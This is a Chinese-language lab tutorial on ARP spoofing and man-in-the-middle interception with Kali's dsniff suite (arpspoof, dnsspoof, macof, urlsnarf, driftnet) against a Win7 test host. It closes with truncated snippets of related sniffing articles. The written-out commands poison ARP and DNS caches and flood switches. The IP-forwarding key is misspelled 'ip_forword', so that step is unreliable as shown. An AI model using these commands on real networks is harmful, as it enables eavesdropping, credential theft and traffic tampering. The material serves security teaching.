arp(address resolution protocol)即位址解析協議, 用於實現從 ip 位址到 mac 位址的對映,即詢問目標ip對應的mac位址,位於資料鏈路層。
arp欺騙(arp spoofing),又稱arp毒化(arp poisoning),通過欺**域網內訪問者pc的閘道器mac位址,使訪問者pc錯以為攻擊者更改後的mac位址是閘道器的macarp欺騙後就可以斷網,竊聽資料,篡改資料等
dsniff是一系列用於網路審計和滲透測試的工具。dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf和webspy被動地監視網路以獲取有趣的資料(密碼,電子郵件,檔案等)。arpspoof,dnsspoof和macof有助於攔截攻擊者通常無法獲得的網路流量(例如,由於第2層交換)。
kali ->ip:192.168.1.111 gw:192.168.1.1 #攻擊機,自帶dsniff
win7 ->ip:192.168.1.114 gw:192.168.1.1 #目標機
arp欺騙工具
arpspoof -i 網絡卡 -t 目標ip 偽裝ip
檢視kali網絡卡
偽裝成閘道器,目標機的流量流向攻擊機
# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1
win7的arp快取表被毒化
arp -a
攻擊前
攻擊後
因為kali沒有開啟ip**功能,就會造成斷網
中間人攻擊
開啟ip**功能,使流量能正常傳遞
# echo 1 > /proc/sys/net/ipv4/ip_forword
ps:記住是/proc/sys
下的net
,在/proc
下也有net
,容易混淆
# vi /etc/sysctl.conf
net.ipv4.ip_forword=1
#sysctl -p 載入配置檔案
arp中間人欺騙
# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1 偽裝成閘道器
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.114 偽裝成win7
這樣kali就成為win7和閘道器橋梁,它們之間的流量都能被監聽
driftnet監聽
driftent
-i 指定網絡卡
-a 不顯示,儲存在臨時目錄
-d 臨時目錄
-b 出現新時發出滴滴聲
wirshark抓包
urlsnarf 抓取訪問的位址
dnsspoof dns欺騙
對監聽到的dns請求進行汙染
dnsspoof
-i 指定網絡卡
-f 指定host格式檔案(預設為指向本ip)
macof mac泛洪
macof [-i inte***ce] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
-e 目標mac位址
-n 傳送次數
造成mac位址溢位,使受害者通訊只能通過廣播的形式,從而達到監聽流量
網路嗅探器
網路嗅探器 把網絡卡設定成混雜模式,並可實現對網路上傳輸的資料報的捕獲與分析。原理 通常的套接字程式只能響應與自己mac位址相匹配的 或者是 廣播形式發出的資料幀,對於其他形式的資料幀網路介面採取的動作是直接丟棄 為了使網絡卡接收所有經過他的封包,要將其設定成混雜模式,通過原始套接字來實現。設定混雜...
網路嗅探實驗
一 實驗目的 掌握sniffer 嗅探器 工具的使用方法,實現ftp http資料報的捕捉。掌握對捕獲資料報的分析方法,了解ftp http資料報的資料結構和連線過程,了解ftp http協議明文傳輸的特性,以建立安全意識。二 實驗環境 每兩個學生為一組 其中學生a進行http或者ftp連線,學生b...
網路嗅探,工具 個
一 nessus 這是一款unix平台的漏洞評估工具,可以說它是最好的 免費的網路漏洞掃瞄程式.其更新速度很快,有超過11000個外掛程式.其關鍵特性包括安全和本地的安全檢查,擁有gtk圖形介面的客戶端 伺服器體系結構,還有乙個嵌入式指令碼語言 可以編寫我們自己的外掛程式或理解現有的外掛程式 nes...